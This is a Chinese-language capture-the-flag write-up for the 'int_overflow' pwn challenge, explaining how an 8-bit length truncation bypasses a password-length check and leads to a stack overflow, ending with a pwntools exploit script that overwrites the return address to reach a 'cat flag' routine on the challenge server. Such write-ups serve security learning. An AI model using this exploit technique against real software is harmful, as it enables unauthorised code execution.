攻防世界pwn int_overflow writeup

这是一道整数溢出题

我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。
拿到题目,我们首先查看一下源代码的保护情况:
攻防世界pwn int_overflow writeup_第1张图片
从上图可以看出,这是一个32位的程序,并且只开了堆栈不可执行的保护。
我们使用IDA查看一下源码:
在这里插入图片描述
我们进入这个check_passwd函数:
攻防世界pwn int_overflow writeup_第2张图片

当v3>3u且v3<8u时,我们可以进入下面的else中。

else中把s的值复制到dest,如果s的值够长,就能造出栈溢出。
但是3 攻防世界pwn int_overflow writeup_第3张图片
在检测s的长度之后,我们可以看到程序把s放到一个al寄存器中,al是一个八位寄存器,

我们知道,八位寄存器对于无符号整数来说是有0~255的范围的

这就是这题整数溢出的关键所在了。
我们找到了溢出点,然后就让我们看看有什么代码是可以利用的:
在这里插入图片描述
果然这里有一个cat flag,跳转到这个地址就可以得到我们想要的flag了!
下面是完整exp:

#! /usr/bin/env python
from pwn import *
p=remote('111.198.29.45',33613)
sys_addr=0x0804868B
payload='a'*24+p32(sys_addr)
payload=payload.ljust(262,'a')
p.recvuntil("Your choice:")
p.sendline("1")
p.recvuntil("Please input your username:\n")
p.sendline("aaaa")
p.recvuntil("Please input your passwd:\n")
p.sendline(payload)
p.interactive()

你可能感兴趣的:(攻防世界pwn int_overflow writeup)